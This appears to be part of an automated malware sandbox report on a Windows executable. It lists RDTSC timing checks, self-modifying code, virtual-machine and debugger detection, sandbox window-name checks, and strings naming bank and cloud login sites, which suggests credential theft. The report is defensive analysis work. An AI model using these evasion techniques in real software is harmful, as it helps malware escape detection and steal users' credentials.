                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100890 second address: 5100896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100896 second address: 510089A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51008C1 second address: 51008F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9C80FB566Dh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51008F1 second address: 5100921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007F9C81394BFEh 0x00000010 je 00007F9C81394C93h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100921 second address: 510095A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9C80FB5673h 0x0000000a or esi, 5B90DC9Eh 0x00000010 jmp 00007F9C80FB5679h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 51009FD second address: 5100A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100A01 second address: 5100A1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100A1C second address: 5100A5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9C81394BFFh 0x00000009 xor ax, 8CDEh 0x0000000e jmp 00007F9C81394C09h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 leave 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100A5A second address: 5100A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 5100A60 second address: 50F0008 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 jmp 00007F9C81394BF2h 0x00000015 xor ebx, ebx 0x00000017 test al, 01h 0x00000019 jne 00007F9C81394BF7h 0x0000001b sub esp, 04h 0x0000001e mov dword ptr [esp], 0000000Dh 0x00000025 call 00007F9C859D21EBh 0x0000002a mov edi, edi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0008 second address: 50F000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F000C second address: 50F0010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0010 second address: 50F0016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0016 second address: 50F001E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F001E second address: 50F00C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F9C80FB5678h 0x0000000d push eax 0x0000000e jmp 00007F9C80FB566Bh 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F9C80FB5676h 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F9C80FB566Eh 0x00000022 sbb ecx, 24C674C8h 0x00000028 jmp 00007F9C80FB566Bh 0x0000002d popfd 0x0000002e mov ax, 6A3Fh 0x00000032 popad 0x00000033 sub esp, 2Ch 0x00000036 jmp 00007F9C80FB5672h 0x0000003b xchg eax, ebx 0x0000003c jmp 00007F9C80FB5670h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F9C80FB566Dh 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F00C2 second address: 50F00C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F00C8 second address: 50F00CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F00CD second address: 50F0117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 jmp 00007F9C81394C05h 0x0000000d xchg eax, edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushfd 0x00000014 jmp 00007F9C81394C09h 0x00000019 jmp 00007F9C81394BFBh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0117 second address: 50F015B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F9C80FB566Dh 0x00000013 sbb cl, 00000016h 0x00000016 jmp 00007F9C80FB5671h 0x0000001b popfd 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F015B second address: 50F0166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0166 second address: 50F017C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F9C80FB5670h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F017C second address: 50F0182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0234 second address: 50F029C instructions: 0x00000000 rdtsc 0x00000002 call 00007F9C80FB5672h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov edi, 00000000h 0x00000010 pushad 0x00000011 call 00007F9C80FB566Ch 0x00000016 mov edx, eax 0x00000018 pop eax 0x00000019 mov bx, B542h 0x0000001d popad 0x0000001e inc ebx 0x0000001f jmp 00007F9C80FB5679h 0x00000024 test al, al 0x00000026 jmp 00007F9C80FB566Eh 0x0000002b je 00007F9C80FB5870h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F029C second address: 50F02B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0325 second address: 50F032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F032B second address: 50F032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F032F second address: 50F0333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0333 second address: 50F0373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F9C81394C04h 0x0000000e push eax 0x0000000f jmp 00007F9C81394BFBh 0x00000014 nop 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 call 00007F9C81394C02h 0x0000001d pop ecx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F03E3 second address: 50F042C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007F9C80FB566Bh 0x0000000c and si, 51FEh 0x00000011 jmp 00007F9C80FB5679h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jg 00007F9CF28236DBh 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F9C80FB566Dh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F042C second address: 50F0456 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F9C81394C4Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9C81394BFDh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0456 second address: 50F0466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9C80FB566Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0466 second address: 50F046A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F046A second address: 50F0519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b pushad 0x0000000c jmp 00007F9C80FB566Dh 0x00000011 movzx eax, bx 0x00000014 popad 0x00000015 jne 00007F9CF282367Ah 0x0000001b jmp 00007F9C80FB5673h 0x00000020 mov ebx, dword ptr [ebp+08h] 0x00000023 jmp 00007F9C80FB5676h 0x00000028 lea eax, dword ptr [ebp-2Ch] 0x0000002b jmp 00007F9C80FB5670h 0x00000030 xchg eax, esi 0x00000031 jmp 00007F9C80FB5670h 0x00000036 push eax 0x00000037 jmp 00007F9C80FB566Bh 0x0000003c xchg eax, esi 0x0000003d pushad 0x0000003e mov ax, 2FBBh 0x00000042 pushfd 0x00000043 jmp 00007F9C80FB5670h 0x00000048 or si, CC08h 0x0000004d jmp 00007F9C80FB566Bh 0x00000052 popfd 0x00000053 popad 0x00000054 nop 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0519 second address: 50F051D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F051D second address: 50F0523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0523 second address: 50F0529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0529 second address: 50F052D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F052D second address: 50F053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, ecx 0x0000000e push esi 0x0000000f pop edi 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F053E second address: 50F05A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, EDh 0x00000005 mov ecx, 27A572F3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e pushad 0x0000000f call 00007F9C80FB5674h 0x00000014 pushfd 0x00000015 jmp 00007F9C80FB5672h 0x0000001a add ecx, 53D74328h 0x00000020 jmp 00007F9C80FB566Bh 0x00000025 popfd 0x00000026 pop esi 0x00000027 popad 0x00000028 xchg eax, ebx 0x00000029 jmp 00007F9C80FB5672h 0x0000002e push eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 mov dx, A5D2h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F05A3 second address: 50F05AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F05AC second address: 50F05CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9C80FB5673h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F05CA second address: 50F05CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F05CE second address: 50F05D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0632 second address: 50F0649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F0649 second address: 50F064D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: 50F064D second address: 50F0653 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSpecial instruction interceptor: First address: AD7AF0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSpecial instruction interceptor: First address: C7A6DF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSpecial instruction interceptor: First address: AD7ABB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe TID: 1584Thread sleep time: -270000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exe TID: 4208Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375970033.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: tPSrcPbmRe.exe, tPSrcPbmRe.exe, 00000000.00000003.2336843987.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198657134.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2377002468.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223056639.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2375411067.0000000001297000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2376803403.0000000001299000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2336843987.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198657134.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2377002468.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223056639.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2297990501.00000000012ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375970033.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245573631.0000000005B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: SICE
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeProcess queried: DebugPortJump to behavior
